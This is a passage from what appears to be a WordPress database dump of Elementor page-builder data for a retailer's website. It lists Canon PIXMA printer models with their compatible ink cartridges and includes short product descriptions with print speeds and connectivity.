Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7098,3327,'_elementor_version','2.5.14'),(8679,3668,'_elementor_template_type','wp-page'),(8680,3668,'_elementor_version','2.7.4'),(7108,3329,'_wp_page_template','template-fullwidth.php'),(7109,3329,'_elementor_edit_mode','builder'),(7110,3329,'_elementor_template_type','post'),(7111,3329,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA 